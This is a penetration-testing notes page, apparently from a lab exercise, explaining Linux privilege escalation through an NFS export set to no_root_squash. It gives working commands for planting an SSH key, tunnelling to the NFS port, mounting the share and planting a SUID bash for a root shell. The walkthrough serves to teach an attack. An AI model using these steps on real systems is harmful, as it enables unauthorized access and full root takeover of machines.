NFS no_root_squash

Read the /etc/exports file, if you find some directory that is configured as no_root_squash, then you can access it from as a client and write inside that directory as if you were the local root of the machine.

This is achieved by performing a simple SSH tunneling routine. For that we generate our local machine's SSH public key and place it inside the victim machine's authorized keys. As seen here that an authorized key in SSH is a public key used for granting login access to users.

no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications. Here, we have access to paradox (another user) and we want to escalate to james (that has no_root_squash enabled)

To exploit this option, we generate keys in local system.

Now we will place our public key in the victim's user account. User's name is paradox.

echo "key value" > authorized_keys

cat authorized_keys

Now we will tunnel the traffic from our local port 3049 to victim's 20149 (NFS port) so that we can mount the victim's share in our local machine. Without tunneling its not possible as we dont have access to the user that has no_root_squash option enabled.

ssh -fN -L 3049:localhost:2049 paradox@10.10.195.53

Now we will make a local NFS share as an endpoint from where we will control victim's machine.

mkdir /tmp/share sudo mount -t nfs -o port=3049 localhost:/ /tmp/share

-o to specify options, in this case the port which will be 3049

cd /tmp/share

now whatever we do in this /tmp/share will be happening with the NFS share at victim's end.

Observe how /tmp/share now has contents of a user and also ssh keys. We use this to login and voila! We are now user james.

Thus we have successfully ecalated to james.

BONUS: We can copy any executable in this directory, set SUID on it and execute it on the victim end. We will have a root shell!! Much like this:

Then, on our local /tmp/share mount, we set SUID on stef (/bin/bash binary)

And finally, we know that bash -p executes the binary as its owner. If SUID is set, James can emulate root and run a root shell! Ez

PreviousSUID - man NextSUID - pkexec

Last updated 3 years ago

Was this helpful?